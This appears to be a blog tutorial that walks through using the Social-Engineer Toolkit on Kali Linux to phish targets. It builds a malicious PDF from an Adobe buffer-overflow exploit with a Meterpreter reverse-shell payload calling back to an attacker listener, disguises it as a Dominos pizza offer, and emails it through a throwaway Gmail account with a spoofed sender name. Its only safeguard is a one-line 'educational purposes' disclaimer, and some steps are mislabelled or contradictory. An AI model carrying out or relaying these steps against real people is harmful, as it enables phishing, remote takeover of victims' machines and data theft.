Learn Mass Mailer attack

Abdul Baasith
5 min readJul 29, 2021

Introduction

The ethical hacking community is not unfamiliar with the concept of sending mass emails. During phishing tests, we must undoubtedly send mass emails. Penetration testers must frequently send bulk emails to the workers of the organization who ordered the penetration test during phishing.
There are many software options available for bulk mail sending but the best tool on the market is already present in our favorite penetration testing OS : KALI Linux

So we all want to how it done 😋

🕵️ 🕵️‍♂️🕵️ 🕵️‍♂️Lets go step by step!🕵️ 🕵️‍♂️🕵️ 🕵️‍♂️

Step 1

First open the Kali terminal, then enter setoolkit to enter the SET toolkit

root@kali:~# setoolkit

Step 2

you will get the following options

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

In the following options, social engineering attack, enter 1 and press Enter

Step 3

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules

99) Return back to the main menu.

In the following options, 1 is a spear phishing attack, enter 1 and press Enter

Step 4

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

The following option 1 is an attack against mail, enter 1 and press Enter

Step 5

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS15–100 Microsoft Windows Media Center MCL Vulnerability
4) MS14–017 Microsoft Word RTF Object Confusion (2014–04–01)
5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10–087)
7) Adobe Flash Player “Button” Remote Code Execution
8) Adobe CoolType SING Table “uniqueName” Overflow
9) Adobe Flash Player “newfunction” Invalid Pointer Use
10) Adobe Collab.collectEmailInfo Buffer Overflow
11) Adobe Collab.getIcon Buffer Overflow
12) Adobe JBIG2Decode Memory Corruption Exploit
13) Adobe PDF Embedded EXE Social Engineering
14) Adobe util.printf() Buffer Overflow
15) Custom EXE to VBA (sent via RAR) (RAR required)
16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
17) Adobe PDF Embedded EXE Social Engineering (NOJS)
18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
19) Apple QuickTime PICT PnSize Buffer Overflow
20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
21) Adobe Reader u3D Memory Corruption Vulnerability
22) MSCOMCTL ActiveX Buffer Overflow (ms12–027)

Then I came here and chose a file vulnerability so lets chose 10 here, which is a vulnerability for Adobe PDF files.

Press 10 and hit Enter

Step 6

1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

Then I choose the attack payload.

press 2 and hit Enter

what is Meterpreter Reverse

Meterpreter uses a reverse_tcp shell, which means it connects to a listener on the attacker’s machine. simply we get the access of the victims machine to our shell.

Step 7

set> IP address or URL (www.sad.com) for the payload listener (LHOST) [192.168.153.131]: 192.168.8.1

you will be prompted to enter the address that the listener needs to listen to, which is the IP address of our local host

type ipconfig to find your ip

Step 8

set:payloads> Port to connect back on [443]:

this is for listening port just press Enter if you want it can be changed

Step 9

set:phishing>2
set:phishing> New filename: Dominos_pizza_offer.pdf

you will get two option one to modify the file press 1 and to rename the file press 2

Step 10

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer

99. Return to main menu.

So in this one you can select a mass mail attack all the mail should be written in a .txt file and give the location of the file to launch the attack

for demo purpose ill do a single Email attack

By pressing 1 and Enter

Step 11

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

This actually your choice if you know about the victim you can create your own template

but i will be going with per-defined templates

Step 12

[-] Available templates:
1: Have you seen this?
2: Computer Issue
3: How long has it been?
4: Strange internet usage from your computer
5: WOAAAA!!!!!!!!!! This is crazy…
6: New Update
7: Order Confirmation
8: Dan Brown’s Angels & Demons
9: Status Report
10: Baby Pics

Select what you like

ill go with 5

Step 13

set:phishing> Send email to: hackedboy@gmail.com

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

Use your own gmail account
create a optional one do not use your main account

Press 1 And Enter

Step 14

set:phishing> Your gmail email address: hackerboy@gmail.com

set:phishing> Dominos Pizza (this is the from name)

Email password: *********

set:phishing> Flag this message/s as high priority? [yes|no]:yes

set:phishing> Flag this message/s as high priority? [yes|no]:yes
[*] Unable to connect to mail server. Try again (Internet issues?)
[*] SET has finished delivering the emails
set:phishing> Setup a listener [yes|no]:

Show that the mail has been sent, ask whether to open the listener, no

type Yes and wait till the victim get caught

Finished

NOTE

DISCLAIMER: This article is for educational purposes only. We are not responsible for any harm caused while referring to it.

Thank you

--

--

Abdul Baasith

Hi there iam Abdul Baasith Software Engineer .I'am Typically a person who thinks out of the box . If your tool is a hammer then every problem look like a nail